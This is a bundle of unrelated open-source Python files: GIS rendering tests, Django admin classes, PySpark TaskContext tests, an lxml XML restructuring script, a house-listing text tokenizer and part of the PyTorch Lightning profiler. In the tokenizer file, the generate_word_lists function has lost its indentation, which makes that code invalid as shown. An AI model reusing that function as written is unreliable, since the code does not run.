        # myImage.fill(QtGui.QColor(200, 200, 200))
        # Packed RGB value equivalent to (200, 200, 200).
        myImage.fill(200 + 200 * 256 + 200 * 256 * 256)
        myFilename = os.path.join(temp_dir(), 'greyBox')
        myImage.save(myFilename, 'PNG')
        # Draw the same box diagonally down the page via three code paths:
        # composer picture, raw pixmap, and our drawImage helper.
        for i in range(10, 190, 10):
            myPicture = QgsComposerPicture(myMap.composition)
            myPicture.setPictureFile(myFilename)
            if qgisVersion() >= 10800:  # 1.8 or newer
                myPicture.setFrameEnabled(False)
            else:
                myPicture.setFrame(False)
            myPicture.setItemPosition(i,  # x
                                      i,  # y
                                      10,  # width
                                      10)  # height
            myMap.composition.addItem(myPicture)
            # Same drawing drawn directly as a pixmap
            myPixmapItem = myMap.composition.addPixmap(
                QtGui.QPixmap.fromImage(myImage))
            myPixmapItem.setOffset(i, i + 20)
            # Same drawing using our drawImage Helper
            myWidthMM = 1
            myMap.drawImage(myImage, myWidthMM, i, i + 40)
        myImagePath, _, _ = myMap.renderComposition()
        # when this test no longer matches our broken render hash
        # we know the issue is fixed
        myControlImages = ['windowsArtifacts.png']
        myTolerance = 0
        myFlag, myMessage = checkImages(myControlImages,
                                        myImagePath,
                                        myTolerance)
        myMessage += ('\nWe want these images to match, if they do not '
                      'there may be rendering artifacts in windows.\n')
        assert myFlag, myMessage
if __name__ == '__main__':
    # Allow running this module directly: collect every 'test*' method from
    # MapTest and run with verbose output.
    suite = unittest.makeSuite(MapTest, 'test')
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(suite)
| gijs/inasafe | safe_qgis/test_map.py | Python | gpl-3.0 | 9,289 |
from django.contrib import admin
from systems.models import Machine, Environment
# Expose the inventory models in the Django admin with default ModelAdmin
# options (no custom admin classes).
admin.site.register(Machine)
admin.site.register(Environment)
from django.contrib import admin
from django.forms import widgets
from django.contrib import messages
from django.shortcuts import redirect
from .models import Backend, Embed
from .forms import EmbedForm
from .admin_forms import EmbedFormPreview
class BackendAdmin(admin.ModelAdmin):
    # Backends map to code on disk, so the admin only lets users edit
    # metadata and matching behavior — never create new rows (see add_view).
    list_display = ['name', 'regex', 'priority']
    readonly_fields = ['code_path']
    fieldsets = (
        ('Information', {
            'fields': ('name', 'code_path', 'description')
        }),
        ('Matching Behavior', {
            'fields': ('regex', 'priority')
        }),
    )

    # remove "Add" button
    change_list_template = 'embeds/admin/change_list_template.html'

    def formfield_for_dbfield(self, db_field, **kwargs):
        """Change the form widget for the description field"""
        formfield = super(BackendAdmin, self)\
            .formfield_for_dbfield(db_field, **kwargs)
        if db_field.name == 'description':
            # Swap the default widget for a textarea, keeping its attrs.
            formfield.widget = widgets.Textarea(attrs=formfield.widget.attrs)
        return formfield

    def add_view(self, request, *args, **kwargs):
        """Override the Add view with messaging and a redirect"""
        # Creating Backends via the admin is unsupported; bounce back to the
        # change list with an error message.
        messages.error(request, 'New Backends cannot be added via the Admin.')
        return redirect('admin:embeds_backend_changelist')
class EmbedAdmin(admin.ModelAdmin):
    list_display = ['url', 'title', 'backend_name',
                    'provider', 'type', 'cached']
    list_filter = ['backend__name', 'provider', 'type']
    search_fields = ['url', 'response_cache']

    def title(self, obj):
        # Pull the title from the embed's response, when one exists.
        return obj.response.title if obj.response else ''

    def backend_name(self, obj):
        return obj.backend.name
    backend_name.short_description = "Backend"

    def cached(self, obj):
        # Rendered as a boolean icon in the change list.
        return bool(obj.response_cache)
    cached.boolean = True

    def get_urls(self):
        """Route add/change through the EmbedFormPreview flow instead of the
        default admin views."""
        try:
            from django.conf.urls import patterns, url
        except ImportError:  # DROP_WITH_DJANGO13  # pragma: no cover
            from django.conf.urls.defaults import patterns, url
        info = self.model._meta.app_label, self.model._meta.object_name.lower()
        # Names mirror the admin's default '<app>_<model>_add/change' scheme
        # so reverse() keeps working.
        my_urls = patterns('',
            url(r'^add/$', EmbedFormPreview(EmbedForm, self), name='%s_%s_add' % info),
            url(r'^(\d+)/$', EmbedFormPreview(EmbedForm, self), name='%s_%s_change' % info),
        )
        return my_urls + super(EmbedAdmin, self).get_urls()
# Wire both models into the default admin site with their custom admin classes.
admin.site.register(Embed, EmbedAdmin)
admin.site.register(Backend, BackendAdmin)
| armstrong/armstrong.apps.embeds | armstrong/apps/embeds/admin.py | Python | apache-2.0 | 2,509 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import random
import shutil
import stat
import sys
import tempfile
import time
import unittest
from pyspark import SparkConf, SparkContext, TaskContext, BarrierTaskContext
from pyspark.testing.utils import PySparkTestCase, SPARK_HOME
# Python 2/3 compatibility: Python 3 has no xrange, so alias it to range.
if sys.version_info[0] >= 3:
    xrange = range
class TaskContextTests(PySparkTestCase):
    # End-to-end checks of TaskContext / BarrierTaskContext behavior against a
    # real local SparkContext; each test actually runs Spark jobs.

    def setUp(self):
        self._old_sys_path = list(sys.path)
        class_name = self.__class__.__name__
        # Allow retries even though they are normally disabled in local mode
        self.sc = SparkContext('local[4, 2]', class_name)

    def test_stage_id(self):
        """Test the stage ids are available and incrementing as expected."""
        rdd = self.sc.parallelize(range(10))
        # Each take() triggers a new job, hence a new stage id.
        stage1 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
        stage2 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
        # Test using the constructor directly rather than the get()
        stage3 = rdd.map(lambda x: TaskContext().stageId()).take(1)[0]
        self.assertEqual(stage1 + 1, stage2)
        self.assertEqual(stage1 + 2, stage3)
        self.assertEqual(stage2 + 1, stage3)

    def test_resources(self):
        """Test the resources are empty by default."""
        rdd = self.sc.parallelize(range(10))
        resources1 = rdd.map(lambda x: TaskContext.get().resources()).take(1)[0]
        # Test using the constructor directly rather than the get()
        resources2 = rdd.map(lambda x: TaskContext().resources()).take(1)[0]
        self.assertEqual(len(resources1), 0)
        self.assertEqual(len(resources2), 0)

    def test_partition_id(self):
        """Test the partition id."""
        rdd1 = self.sc.parallelize(range(10), 1)
        rdd2 = self.sc.parallelize(range(10), 2)
        pids1 = rdd1.map(lambda x: TaskContext.get().partitionId()).collect()
        pids2 = rdd2.map(lambda x: TaskContext.get().partitionId()).collect()
        self.assertEqual(0, pids1[0])
        self.assertEqual(0, pids1[9])
        self.assertEqual(0, pids2[0])
        # Second half of the 2-partition RDD runs in partition 1.
        self.assertEqual(1, pids2[9])

    def test_attempt_number(self):
        """Verify the attempt numbers are correctly reported."""
        rdd = self.sc.parallelize(range(10))
        # Verify a simple job with no failures
        attempt_numbers = rdd.map(lambda x: TaskContext.get().attemptNumber()).collect()
        # NOTE(review): on Python 3 map()/filter() are lazy, so these
        # map(...assertEqual...) lines never execute their assertions.
        map(lambda attempt: self.assertEqual(0, attempt), attempt_numbers)

        def fail_on_first(x):
            """Fail on the first attempt so we get a positive attempt number"""
            tc = TaskContext.get()
            attempt_number = tc.attemptNumber()
            partition_id = tc.partitionId()
            attempt_id = tc.taskAttemptId()
            if attempt_number == 0 and partition_id == 0:
                raise Exception("Failing on first attempt")
            else:
                return [x, partition_id, attempt_number, attempt_id]
        result = rdd.map(fail_on_first).collect()
        # We should re-submit the first partition to it but other partitions should be attempt 0
        self.assertEqual([0, 0, 1], result[0][0:3])
        self.assertEqual([9, 3, 0], result[9][0:3])
        first_partition = filter(lambda x: x[1] == 0, result)
        map(lambda x: self.assertEqual(1, x[2]), first_partition)
        other_partitions = filter(lambda x: x[1] != 0, result)
        map(lambda x: self.assertEqual(0, x[2]), other_partitions)
        # The task attempt id should be different
        self.assertTrue(result[0][3] != result[9][3])

    def test_tc_on_driver(self):
        """Verify that getting the TaskContext on the driver returns None."""
        tc = TaskContext.get()
        self.assertTrue(tc is None)

    def test_get_local_property(self):
        """Verify that local properties set on the driver are available in TaskContext."""
        key = "testkey"
        value = "testvalue"
        self.sc.setLocalProperty(key, value)
        try:
            rdd = self.sc.parallelize(range(1), 1)
            prop1 = rdd.map(lambda _: TaskContext.get().getLocalProperty(key)).collect()[0]
            self.assertEqual(prop1, value)
            prop2 = rdd.map(lambda _: TaskContext.get().getLocalProperty("otherkey")).collect()[0]
            self.assertTrue(prop2 is None)
        finally:
            # Always clear the property so later tests are unaffected.
            self.sc.setLocalProperty(key, None)

    def test_barrier(self):
        """
        Verify that BarrierTaskContext.barrier() performs global sync among all barrier tasks
        within a stage.
        """
        rdd = self.sc.parallelize(range(10), 4)

        def f(iterator):
            yield sum(iterator)

        def context_barrier(x):
            tc = BarrierTaskContext.get()
            # Random stagger so tasks reach the barrier at different times;
            # the barrier should still line up their release times.
            time.sleep(random.randint(1, 10))
            tc.barrier()
            return time.time()

        times = rdd.barrier().mapPartitions(f).map(context_barrier).collect()
        self.assertTrue(max(times) - min(times) < 1)

    def test_barrier_infos(self):
        """
        Verify that BarrierTaskContext.getTaskInfos() returns a list of all task infos in the
        barrier stage.
        """
        rdd = self.sc.parallelize(range(10), 4)

        def f(iterator):
            yield sum(iterator)

        taskInfos = rdd.barrier().mapPartitions(f).map(lambda x: BarrierTaskContext.get()
                                                       .getTaskInfos()).collect()
        # One info list per task, each listing all 4 tasks in the stage.
        self.assertTrue(len(taskInfos) == 4)
        self.assertTrue(len(taskInfos[0]) == 4)

    def test_context_get(self):
        """
        Verify that TaskContext.get() works both in or not in a barrier stage.
        """
        rdd = self.sc.parallelize(range(10), 4)

        def f(iterator):
            # Offset the partition id by 1 in a barrier stage, by 2 otherwise,
            # so the collected values reveal which context type was returned.
            taskContext = TaskContext.get()
            if isinstance(taskContext, BarrierTaskContext):
                yield taskContext.partitionId() + 1
            elif isinstance(taskContext, TaskContext):
                yield taskContext.partitionId() + 2
            else:
                yield -1

        # for normal stage
        result1 = rdd.mapPartitions(f).collect()
        self.assertTrue(result1 == [2, 3, 4, 5])
        # for barrier stage
        result2 = rdd.barrier().mapPartitions(f).collect()
        self.assertTrue(result2 == [1, 2, 3, 4])

    def test_barrier_context_get(self):
        """
        Verify that BarrierTaskContext.get() should only works in a barrier stage.
        """
        rdd = self.sc.parallelize(range(10), 4)

        def f(iterator):
            try:
                taskContext = BarrierTaskContext.get()
            except Exception:
                # Expected in a non-barrier stage.
                yield -1
            else:
                yield taskContext.partitionId()

        # for normal stage
        result1 = rdd.mapPartitions(f).collect()
        self.assertTrue(result1 == [-1, -1, -1, -1])
        # for barrier stage
        result2 = rdd.barrier().mapPartitions(f).collect()
        self.assertTrue(result2 == [0, 1, 2, 3])
class TaskContextTestsWithWorkerReuse(unittest.TestCase):
    # Same context checks but with spark.python.worker.reuse enabled, so the
    # same Python worker processes serve successive jobs.

    def setUp(self):
        class_name = self.__class__.__name__
        conf = SparkConf().set("spark.python.worker.reuse", "true")
        self.sc = SparkContext('local[2]', class_name, conf=conf)

    def test_barrier_with_python_worker_reuse(self):
        """
        Regression test for SPARK-25921: verify that BarrierTaskContext.barrier() with
        reused python worker.
        """
        # start a normal job first to start all workers and get all worker pids
        worker_pids = self.sc.parallelize(range(2), 2).map(lambda x: os.getpid()).collect()
        # the worker will reuse in this barrier job
        rdd = self.sc.parallelize(range(10), 2)

        def f(iterator):
            yield sum(iterator)

        def context_barrier(x):
            tc = BarrierTaskContext.get()
            # Random stagger; the barrier should still synchronize releases.
            time.sleep(random.randint(1, 10))
            tc.barrier()
            return (time.time(), os.getpid())

        result = rdd.barrier().mapPartitions(f).map(context_barrier).collect()
        times = list(map(lambda x: x[0], result))
        pids = list(map(lambda x: x[1], result))
        # check both barrier and worker reuse effect
        self.assertTrue(max(times) - min(times) < 1)
        for pid in pids:
            self.assertTrue(pid in worker_pids)

    def test_task_context_correct_with_python_worker_reuse(self):
        """Verify the task context correct when reused python worker"""
        # start a normal job first to start all workers and get all worker pids
        worker_pids = self.sc.parallelize(xrange(2), 2).map(lambda x: os.getpid()).collect()
        # the worker will reuse in this barrier job
        rdd = self.sc.parallelize(xrange(10), 2)

        def context(iterator):
            # Report (TaskContext partition, BarrierTaskContext partition or
            # -1 when not in a barrier stage, worker pid).
            tp = TaskContext.get().partitionId()
            try:
                bp = BarrierTaskContext.get().partitionId()
            except Exception:
                bp = -1
            yield (tp, bp, os.getpid())

        # normal stage after normal stage
        normal_result = rdd.mapPartitions(context).collect()
        tps, bps, pids = zip(*normal_result)
        # NOTE(review): stray debug print left in the test; consider removing.
        print(tps)
        self.assertTrue(tps == (0, 1))
        self.assertTrue(bps == (-1, -1))
        for pid in pids:
            self.assertTrue(pid in worker_pids)
        # barrier stage after normal stage
        barrier_result = rdd.barrier().mapPartitions(context).collect()
        tps, bps, pids = zip(*barrier_result)
        self.assertTrue(tps == (0, 1))
        self.assertTrue(bps == (0, 1))
        for pid in pids:
            self.assertTrue(pid in worker_pids)
        # normal stage after barrier stage
        normal_result2 = rdd.mapPartitions(context).collect()
        tps, bps, pids = zip(*normal_result2)
        self.assertTrue(tps == (0, 1))
        self.assertTrue(bps == (-1, -1))
        for pid in pids:
            self.assertTrue(pid in worker_pids)

    def tearDown(self):
        self.sc.stop()
class TaskContextTestsWithResources(unittest.TestCase):
    # Runs against a local-cluster with a fake GPU discovery script so that
    # TaskContext.resources() reports one gpu with address "0".

    def setUp(self):
        class_name = self.__class__.__name__
        # Fake discovery script: echoes a JSON resource descriptor for 1 gpu.
        self.tempFile = tempfile.NamedTemporaryFile(delete=False)
        self.tempFile.write(b'echo {\\"name\\": \\"gpu\\", \\"addresses\\": [\\"0\\"]}')
        self.tempFile.close()
        # create temporary directory for Worker resources coordination
        self.tempdir = tempfile.NamedTemporaryFile(delete=False)
        # Only the name is needed; Spark will create the directory itself.
        os.unlink(self.tempdir.name)
        # Make the discovery script executable by owner/group/others.
        os.chmod(self.tempFile.name, stat.S_IRWXU | stat.S_IXGRP | stat.S_IRGRP |
                 stat.S_IROTH | stat.S_IXOTH)
        conf = SparkConf().set("spark.test.home", SPARK_HOME)
        conf = conf.set("spark.resources.dir", self.tempdir.name)
        conf = conf.set("spark.worker.resource.gpu.discoveryScript", self.tempFile.name)
        conf = conf.set("spark.worker.resource.gpu.amount", 1)
        conf = conf.set("spark.task.resource.gpu.amount", "1")
        conf = conf.set("spark.executor.resource.gpu.amount", "1")
        self.sc = SparkContext('local-cluster[2,1,1024]', class_name, conf=conf)

    def test_resources(self):
        """Test the resources are available."""
        rdd = self.sc.parallelize(range(10))
        resources = rdd.map(lambda x: TaskContext.get().resources()).take(1)[0]
        self.assertEqual(len(resources), 1)
        self.assertTrue('gpu' in resources)
        self.assertEqual(resources['gpu'].name, 'gpu')
        self.assertEqual(resources['gpu'].addresses, ['0'])

    def tearDown(self):
        # Remove the fake discovery script and coordination dir, then stop Spark.
        os.unlink(self.tempFile.name)
        shutil.rmtree(self.tempdir.name)
        self.sc.stop()
if __name__ == "__main__":
    import unittest
    from pyspark.tests.test_taskcontext import *

    try:
        # Prefer xmlrunner (JUnit-style XML reports for CI) when installed.
        import xmlrunner
        testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
    except ImportError:
        # Fall back to the default text runner.
        testRunner = None
    unittest.main(testRunner=testRunner, verbosity=2)
| darionyaphet/spark | python/pyspark/tests/test_taskcontext.py | Python | apache-2.0 | 12,677 |
#!/usr/bin/python
from lxml import etree
import sys
import re
def promote(el):
    # snips el out of parent, creates it as a sibling of parent under container, and
    # creates a new copy of parent with type="split" to contain all trailing content
    # of parent after el. may be called repeatedly. returns the new, promoted copy
    # of el.
    #
    # NOTE(review): if el is not found under parent (or parent under
    # container), new_el is never bound and the final return raises
    # NameError — callers apparently guarantee the element is present.
    parent = el.getparent()
    container = parent.getparent()
    for i,child in enumerate(container):
        if child == parent:
            for j,grandchild in enumerate(child):
                if grandchild == el:
                    # first we make a copy of the element in its grandparent
                    container.insert(i+1,etree.Element(el.tag,attrib={"type":"promoted"}))
                    new_el = container[i+1]
                    new_el.text = el.text
                    for e in el.getchildren():
                        # untested, since stages have no children in the monk shakespeare.
                        new_el.append(e)
                    # then we make a new copy of the parent after that, to hold all the trailing
                    # content and nodes.
                    container.insert(i+2,etree.Element(parent.tag,attrib=parent.attrib))
                    split_parent = container[i+2]
                    split_parent.attrib["type"] = "split"
                    # el's tail text belongs to the split copy now.
                    split_parent.text = el.tail # tricky.
                    # then we iterate over the children of parent after el,
                    # and move them to the split_parent
                    for gc in child[j+1:]:
                        split_parent.append(gc)
                        # although it's undocumented, append() appears to also remove gc from the parent
                        # for us; attempting to do so manually raises a
                        # ValueError: Element is not a child of this node.
                        # still, should test carefully.
                    split_parent.tail = parent.tail # again tricky.
                    parent.tail = ""
                    parent.remove(el)
                    break
            break
    return new_el
# Process every file named on the command line: strip XML namespaces, promote
# <stage> elements out of any enclosing <sp>, and write the result to
# "<name>.fixed".  Python 2 script (uses the ``print >> sys.stderr`` syntax).
# NOTE(review): `file` shadows the builtin and neither file handle is
# explicitly closed.
for file in sys.argv[1:]:
    fd = open(file)
    print >> sys.stderr, "reading ", file
    text_string = fd.read()
    root = etree.fromstring(text_string)
    # remove namespaces
    for el in root.getiterator():
        # match clark-style namespace notation
        if el.tag.startswith("{"):
            old_tag = el.tag
            el.tag = re.sub("^[^}]+}","",el.tag)
    # Repeatedly promote each <stage> until no <sp> ancestor remains.
    for el in root.getiterator():
        if el.tag == "stage":
            working_el = el
            while "sp" in [a.tag for a in working_el.iterancestors()]:
                working_el = promote(working_el)
    new_file = file + ".fixed"
    print >> sys.stderr, "writing ", new_file
    new_file = open(new_file,"w")
    # Emit an XML declaration, then the serialized (re-encoded) tree.
    new_file.write("<?xml version='1.0' encoding='utf-8'?>")
    tree = etree.ElementTree(root)
    new_string = etree.tostring(tree,encoding="utf-8")
    new_string = new_string.decode("utf-8").encode("utf-8")
    new_file.write(new_string)
import cPickle
import nz_houses_dao as dao
from nltk.corpus import stopwords
import re
import gzip
class Residential:
    """Placeholder model for a residential property listing.

    The original class body contained stray tokens ("distionary" and a
    bare "def") that made the module unimportable, and ``__init__`` was
    declared without ``self`` so instantiation would raise TypeError.
    """

    def __init__(self):
        # No state yet; this class is a stub for future listing attributes.
        pass
def generate_word_lists(descriptions):
descriptions_features = {}
i = 0
for listingId in descriptions.keys():
a = descriptions[listingId].lower()
a = re.sub(r'\d+',r'',a)
a = re.sub(r'sqm',r'',a)
a = re.sub(r'm2',r'',a)
a_words = re.findall(r'\w+',a) #,flags = re.UNICODE | re.LOCALE)
a_words = filter(lambda x: x not in stopwords.words('english'), a_words)
descriptions_features[listingId] = a_words
if i % 50 == 0:
print i
i += 1
return descriptions_features
def print_words(a_words):
b = ''
for word in a_words:
b = b + str(word) + ' '
print b
if __name__ == '__main__':
    # SQLite database of scraped listings (see nz_houses_dao for the query).
    dbFilePath = '/Users/james/development/code_personal/nz-houses/db/prod1.db'
    #df_1 = read_listing_table(dbFilePath)
    #df_1 = df_sqlite[df_sqlite['ListingId'] > 641386568]
    #print df_1.describe()
    #a = df_1[-1:]['Body']
    #print a.to_string()
    query_result = dao.read_listing_table(dbFilePath)
    # pickle_flag == 0: rebuild the tokenized descriptions and cache them;
    # pickle_flag == 1: load the cached tokens and preview a few listings.
    pickle_flag = 1
    if pickle_flag == 0:
        descriptions = {}
        for row in query_result:
            # Assumes row[0] is the ListingId and row[1] the free-text
            # description — TODO confirm against the DAO's column order.
            descriptions[row[0]] = row[1]
        descriptions_features = generate_word_lists(descriptions)
        # protocol=2 keeps the pickle readable by other Python 2 tools.
        with gzip.open('/Users/james/development/code_personal/nz-houses/db/descriptions_features.pkl.gz', 'wb') as f:
            cPickle.dump(descriptions_features, f, protocol=2)
    if pickle_flag == 1:
        with gzip.open('/Users/james/development/code_personal/nz-houses/db/descriptions_features.pkl.gz', 'rb') as f:
            descriptions_features = cPickle.load(f)
        i = 0
        # Show the word lists for 10 listings, iterating keys in reverse
        # (dict key order is arbitrary here, so "reverse" is not meaningful
        # chronology — NOTE(review): confirm intent).
        for listingId in reversed(descriptions_features.keys()):
            print listingId
            print_words(descriptions_features[listingId])
            print '-----------'
            i += 1
            if i == 10:
                break
| statX/nz-houses | analysis/listing_text.py | Python | bsd-2-clause | 1,824 |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Profiler to check if there are any bottlenecks in your code."""
import inspect
import logging
import os
from functools import partial
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Type, TYPE_CHECKING, Union
import torch
from torch import nn, Tensor
from torch.autograd.profiler import record_function
from pytorch_lightning.profiler.base import BaseProfiler
from pytorch_lightning.utilities import rank_zero_warn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _KINETO_AVAILABLE
if TYPE_CHECKING:
from torch.autograd.profiler import EventList
from torch.utils.hooks import RemovableHandle
from pytorch_lightning.core.lightning import LightningModule
if _KINETO_AVAILABLE:
from torch.profiler import ProfilerAction, ProfilerActivity, tensorboard_trace_handler
log = logging.getLogger(__name__)
_PROFILER = Union[torch.autograd.profiler.profile, torch.cuda.profiler.profile, torch.autograd.profiler.emit_nvtx]
class RegisterRecordFunction:
    """
    Adds ``record_function`` labels around every named submodule's forward
    pass, so autograd profiles show which module each operator belongs to.

    The Lightning PyTorch Profiler enables this automatically; pass
    ``record_module_names=False`` to ``PyTorchProfiler`` to disable it.

    It can be used outside of Lightning as follows:

    Example::

        from pytorch_lightning import Trainer, seed_everything
        with RegisterRecordFunction(model):
            out = model(batch)
    """

    def __init__(self, model: nn.Module) -> None:
        self._model = model
        # Open record_function contexts, keyed by label.
        self._records: Dict[str, record_function] = {}
        # Registered [pre-hook, post-hook] handle pairs, keyed by module name.
        self._handles: Dict[str, List["RemovableHandle"]] = {}

    def _start_recording_forward(self, _: nn.Module, input: Tensor, record_name: str) -> Tensor:
        # Open the labelled region just before the module's forward runs.
        opened = record_function(record_name)
        opened.__enter__()
        self._records[record_name] = opened
        return input

    def _stop_recording_forward(self, _: nn.Module, __: Tensor, output: Tensor, record_name: str) -> Tensor:
        # Close the region opened by the matching pre-hook.
        self._records[record_name].__exit__(None, None, None)
        return output

    def __enter__(self) -> None:
        for name, module in self._model.named_modules():
            if not name:
                # Skip the anonymous root module itself.
                continue
            qualified = f"{type(module).__module__}.{type(module).__name__}"
            label = f"{qualified}: {name}"
            opener = module.register_forward_pre_hook(
                partial(self._start_recording_forward, record_name=label)
            )
            closer = module.register_forward_hook(
                partial(self._stop_recording_forward, record_name=label)
            )
            self._handles[name] = [opener, closer]

    def __exit__(self, type: Any, value: Any, traceback: Any) -> None:
        for hook_pair in self._handles.values():
            for handle in hook_pair:
                handle.remove()
        self._handles = {}
class ScheduleWrapper:
    """
    This class is used to override the schedule logic from the profiler and perform
    recording for both `training_step`, `validation_step`.

    It keeps an independent step counter per profiled action so the wrapped
    ``torch.profiler`` schedule sees a consistent step sequence even though
    Lightning interleaves calls from different hooks.
    """

    def __init__(self, schedule: Callable) -> None:
        # ProfilerAction (returned by the schedule) only exists with kineto.
        if not _KINETO_AVAILABLE:
            raise ModuleNotFoundError("You are trying to use `ScheduleWrapper` which require kineto install.")
        self._schedule = schedule
        self.reset()

    def setup(self, start_action_name: str) -> None:
        # Name of the action that started the profiler (e.g. "on_fit_start").
        self._start_action_name = start_action_name

    def pre_step(self, current_action: str) -> None:
        # Remember which action the upcoming profiler step belongs to.
        self._current_action = current_action

    def reset(self):
        """Reset all per-action counters and end-of-schedule flags."""
        self._num_optimizer_step_and_closure = 0
        self._num_validation_step = 0
        self._num_test_step = 0
        self._num_predict_step = 0
        self._optimizer_step_and_closure_reached_end = False
        self._validation_step_reached_end = False
        self._test_step_reached_end = False
        self._predict_step_reached_end = False
        # used to stop profiler when `ProfilerAction.RECORD_AND_SAVE` is reached.
        self._current_action: Optional[str] = None
        self._start_action_name: Optional[str] = None

    @property
    def num_step(self) -> int:
        """Step count for the action currently being profiled (0 if unknown)."""
        if self._current_action is not None and self._current_action.startswith("optimizer_step_and_closure_"):
            return self._num_optimizer_step_and_closure
        if self._current_action == "validation_step":
            return self._num_validation_step
        if self._current_action == "test_step":
            return self._num_test_step
        if self._current_action == "predict_step":
            return self._num_predict_step
        return 0

    def _step(self) -> None:
        # Advance the counter belonging to the current action.
        if self._current_action is not None and self._current_action.startswith("optimizer_step_and_closure_"):
            self._num_optimizer_step_and_closure += 1
        elif self._current_action == "validation_step":
            if self._start_action_name == "on_fit_start":
                # NOTE(review): presumably skips validation iterations run
                # before the first optimizer step (sanity check) — confirm.
                if self._num_optimizer_step_and_closure > 0:
                    self._num_validation_step += 1
            else:
                self._num_validation_step += 1
        elif self._current_action == "test_step":
            self._num_test_step += 1
        elif self._current_action == "predict_step":
            self._num_predict_step += 1

    @property
    def has_finished(self) -> bool:
        """Whether the current action already produced its RECORD_AND_SAVE step."""
        if self._current_action is not None and self._current_action.startswith("optimizer_step_and_closure_"):
            return self._optimizer_step_and_closure_reached_end
        if self._current_action == "validation_step":
            return self._validation_step_reached_end
        if self._current_action == "test_step":
            return self._test_step_reached_end
        if self._current_action == "predict_step":
            return self._predict_step_reached_end
        return False

    def __call__(self, num_step: int) -> "ProfilerAction":
        # ignore the provided input. Keep internal state instead.
        if self.has_finished:
            return ProfilerAction.NONE
        self._step()
        action = self._schedule(self.num_step)
        if action == ProfilerAction.RECORD_AND_SAVE:
            # Latch the end flag so subsequent calls return NONE for this action.
            if self._current_action is not None and self._current_action.startswith("optimizer_step_and_closure_"):
                self._optimizer_step_and_closure_reached_end = True
            elif self._current_action == "validation_step":
                self._validation_step_reached_end = True
            elif self._current_action == "test_step":
                self._test_step_reached_end = True
            elif self._current_action == "predict_step":
                self._predict_step_reached_end = True
        return action
class PyTorchProfiler(BaseProfiler):
    """Profiler reporting the cost of PyTorch operators executed during Lightning hooks.

    Built on ``torch.profiler`` when kineto is available (with optional
    Chrome-trace and flame-graph export), otherwise on
    ``torch.autograd.profiler``.
    """

    # Lightning actions that are wrapped in a `record_function` label.
    RECORD_FUNCTIONS = {
        "training_step_and_backward",
        "training_step",
        "backward",
        "validation_step",
        "test_step",
        "predict_step",
    }
    # Actions starting with this prefix (one per optimizer) are also wrapped.
    RECORD_FUNCTION_PREFIX = "optimizer_step_and_closure_"
    # Actions whose `stop` advances the kineto profiler step.
    STEP_FUNCTIONS = {"validation_step", "test_step", "predict_step"}
    STEP_FUNCTION_PREFIX = "optimizer_step_and_closure_"
    AVAILABLE_SORT_KEYS = {
        "cpu_time",
        "cuda_time",
        "cpu_time_total",
        "cuda_time_total",
        "cpu_memory_usage",
        "cuda_memory_usage",
        "self_cpu_memory_usage",
        "self_cuda_memory_usage",
        "count",
    }
    # Actions on which a profiler session may be (lazily) started.
    START_RECORD_FUNCTIONS = {"on_fit_start", "on_validation_start", "on_test_start", "on_predict_start"}

    def __init__(
        self,
        dirpath: Optional[Union[str, Path]] = None,
        filename: Optional[str] = None,
        group_by_input_shapes: bool = False,
        emit_nvtx: bool = False,
        export_to_chrome: bool = True,
        row_limit: int = 20,
        sort_by_key: Optional[str] = None,
        record_functions: Set[str] = None,
        record_module_names: bool = True,
        **profiler_kwargs: Any,
    ) -> None:
        """
        This profiler uses PyTorch's Autograd Profiler and lets you inspect the cost of
        different operators inside your model - both on the CPU and GPU

        Args:
            dirpath: Directory path for the ``filename``. If ``dirpath`` is ``None`` but ``filename`` is present, the
                ``trainer.log_dir`` (from :class:`~pytorch_lightning.loggers.tensorboard.TensorBoardLogger`)
                will be used.

            filename: If present, filename where the profiler results will be saved instead of printing to stdout.
                The ``.txt`` extension will be used automatically.

            group_by_input_shapes: Include operator input shapes and group calls by shape.

            emit_nvtx: Context manager that makes every autograd operation emit an NVTX range
                Run::

                    nvprof --profile-from-start off -o trace_name.prof -- <regular command here>

                To visualize, you can either use::

                    nvvp trace_name.prof
                    torch.autograd.profiler.load_nvprof(path)

            export_to_chrome: Whether to export the sequence of profiled operators for Chrome.
                It will generate a ``.json`` file which can be read by Chrome.

            row_limit: Limit the number of rows in a table, ``-1`` is a special value that
                removes the limit completely.

            sort_by_key: Attribute used to sort entries. By default
                they are printed in the same order as they were registered.
                Valid keys include: ``cpu_time``, ``cuda_time``, ``cpu_time_total``,
                ``cuda_time_total``, ``cpu_memory_usage``, ``cuda_memory_usage``,
                ``self_cpu_memory_usage``, ``self_cuda_memory_usage``, ``count``.

            record_functions: Set of profiled functions which will create a context manager on.
                Any other will be pass through.

            record_module_names: Whether to add module names while recording autograd operation.

            profiler_kwargs: Keyword arguments for the PyTorch profiler. This depends on your PyTorch version

        Raises:
            MisconfigurationException:
                If arg ``sort_by_key`` is not present in ``AVAILABLE_SORT_KEYS``.
                If arg ``schedule`` is not a ``Callable``.
                If arg ``schedule`` does not return a ``torch.profiler.ProfilerAction``.
        """
        super().__init__(dirpath=dirpath, filename=filename)

        self._group_by_input_shapes = group_by_input_shapes and profiler_kwargs.get("record_shapes", False)
        self._emit_nvtx = emit_nvtx
        self._export_to_chrome = export_to_chrome
        self._row_limit = row_limit
